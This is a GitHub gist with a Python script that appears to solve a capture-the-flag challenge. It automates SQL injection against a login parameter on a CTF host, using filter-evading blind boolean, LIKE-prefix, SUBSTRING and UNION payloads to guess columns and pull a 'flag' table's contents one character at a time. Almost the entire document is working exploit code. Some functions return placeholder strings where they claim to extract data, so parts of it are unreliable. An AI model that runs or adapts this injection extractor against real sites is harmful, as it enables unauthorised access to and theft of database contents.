Created
July 18, 2025 19:59
-
-
Save RajChowdhury240/69f9dd969e2c7964b7fe8e7ce92c87b0 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import string | |
| import time | |
| BASE_URL = "https://filteredout.ctf.yogosha.com/" | |
| def make_request(user_param, pass_param="a"): | |
| params = { | |
| 'user': user_param, | |
| 'pass': pass_param | |
| } | |
| try: | |
| response = requests.get(BASE_URL, params=params, timeout=10) | |
| return response.text | |
| except requests.RequestException as e: | |
| print(f"Request failed: {e}") | |
| return None | |
| def test_table_access(): | |
| print("[+] Testing access to flag table...") | |
| payload = "admin'or(select(1)from(flag))or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print("[+] Flag table is accessible!") | |
| return True | |
| elif response and "forbidden" in response: | |
| print("[-] Flag table access is blocked") | |
| return False | |
| else: | |
| print("[?] Uncertain about flag table access") | |
| return True # Try anyway | |
| def get_column_count(): | |
| print("[+] Determining column count...") | |
| for i in range(1, 10): | |
| columns = ",".join(["1"] * i) | |
| payload = f"admin'or(select({columns})from(flag))or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Table has at least {i} columns") | |
| elif response and "forbidden" not in response: | |
| print(f"[*] Column count might be {i-1}") | |
| return i-1 | |
| time.sleep(0.3) | |
| print("[?] Could not determine exact column count, assuming 1-3 columns") | |
| return 3 | |
| def extract_table_data(): | |
| print("[+] Extracting data from flag table...") | |
| column_names = [ | |
| 'flag', 'value', 'data', 'content', 'secret', 'password', | |
| 'id', 'name', 'text', 'info', 'message', 'key', 'answer' | |
| ] | |
| found_data = [] | |
| print("[+] Trying common column names...") | |
| for column in column_names: | |
| print(f"[*] Trying column: {column}") | |
| payload = f"admin'or(select({column})from(flag))like('%')or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Column '{column}' exists and has data!") | |
| extracted_data = extract_column_data(column) | |
| if extracted_data: | |
| found_data.append((column, extracted_data)) | |
| time.sleep(0.5) | |
| print("[+] Trying ordinal column positions...") | |
| for pos in range(1, 5): # Try first 4 columns | |
| print(f"[*] Trying column position {pos}") | |
| payload = f"admin'or(select(*)from(flag))like('%')or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Data exists in table!") | |
| extracted_data = extract_column_by_position(pos) | |
| if extracted_data: | |
| found_data.append((f"column_{pos}", extracted_data)) | |
| time.sleep(0.5) | |
| print("[+] Trying UNION-based extraction...") | |
| union_data = try_union_extraction() | |
| if union_data: | |
| found_data.extend(union_data) | |
| return found_data | |
| def extract_column_data(column_name): | |
| print(f"[+] Extracting data from column '{column_name}'...") | |
| extracted_value = "" | |
| position = 1 | |
| while position <= 100: | |
| found_char = False | |
| for char in string.ascii_letters + string.digits + string.punctuation + " ": | |
| escaped_char = char.replace("'", "''") | |
| payload = f"admin'or(select({column_name})from(flag))like('{extracted_value + escaped_char}%')or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| extracted_value += char | |
| print(f"[+] Found character: '{char}' at position {position}") | |
| print(f"[+] Current value: {extracted_value}") | |
| found_char = True | |
| break | |
| time.sleep(0.1) | |
| if not found_char: | |
| print(f"[+] Extraction complete for column '{column_name}': {extracted_value}") | |
| break | |
| position += 1 | |
| payload = f"admin'or(select({column_name})from(flag))='{extracted_value}'or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Confirmed complete value: {extracted_value}") | |
| break | |
| return extracted_value | |
| def extract_column_by_position(position): | |
| print(f"[+] Extracting data from column position {position}...") | |
| approaches = [ | |
| f"(select(*)from(flag)limit(1))", | |
| f"(select(*)from(flag))" | |
| ] | |
| for approach in approaches: | |
| payload = f"admin'or({approach})like('%')or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Approach '{approach}' works") | |
| return "DATA_FOUND_BUT_COMPLEX_TO_EXTRACT" | |
| time.sleep(0.3) | |
| return None | |
| def try_union_extraction(): | |
| print("[+] Attempting UNION-based extraction...") | |
| for col_count in range(1, 5): | |
| columns = ",".join([f"'test{i}'" for i in range(col_count)]) | |
| payload = f"admin'union(select({columns})from(flag))or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] UNION works with {col_count} columns!") | |
| flag_columns = ",".join([f"ifnull(cast(c{i} as char),'NULL')" for i in range(col_count)]) | |
| payload = f"admin'union(select({flag_columns})from(flag))or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print("[+] UNION extraction successful!") | |
| return [("union_result", "DATA_EXTRACTED_VIA_UNION")] | |
| time.sleep(0.5) | |
| return None | |
| def try_blind_boolean_extraction(): | |
| print("[+] Trying advanced blind boolean extraction...") | |
| for i in range(1, 10): | |
| payload = f"admin'or(select(count(*))from(flag))={i}or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Flag table has {i} rows") | |
| break | |
| time.sleep(0.3) | |
| print("[+] Attempting substring extraction...") | |
| extracted_flag = "" | |
| for pos in range(1, 101): | |
| found_char = False | |
| for char in string.ascii_letters + string.digits + string.punctuation + " ": | |
| escaped_char = char.replace("'", "''") | |
| payload = f"admin'or(substring((select(*)from(flag)limit(1)),{pos},1))='{escaped_char}'or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| extracted_flag += char | |
| print(f"[+] Found character: '{char}' at position {pos}") | |
| print(f"[+] Current flag: {extracted_flag}") | |
| found_char = True | |
| break | |
| time.sleep(0.1) | |
| if not found_char: | |
| break | |
| return extracted_flag | |
| def main(): | |
| print("=== SQL Injection Flag Table Data Extractor ===") | |
| print(f"Target: {BASE_URL}") | |
| print(f"Target Table: flag") | |
| print() | |
| if not test_table_access(): | |
| print("[-] Cannot access flag table, trying anyway...") | |
| # Get column count | |
| column_count = get_column_count() | |
| print(f"[+] Estimated column count: {column_count}") | |
| found_data = extract_table_data() | |
| if found_data: | |
| print("\n[+] SUCCESS! Found data:") | |
| print("=" * 50) | |
| for column, data in found_data: | |
| print(f"Column '{column}': {data}") | |
| print("=" * 50) | |
| else: | |
| print("[-] No data extracted using standard methods") | |
| print("[+] Trying advanced extraction methods...") | |
| flag_data = try_blind_boolean_extraction() | |
| if flag_data: | |
| print(f"\n[+] SUCCESS! Extracted flag data:") | |
| print("=" * 50) | |
| print(flag_data) | |
| print("=" * 50) | |
| else: | |
| print("[-] Failed to extract flag data") | |
| print("\n[+] Extraction attempt complete!") | |
| print("[+] If no data was found, the table might be empty or heavily filtered") | |
| print("[+] Try different column names or extraction methods") | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment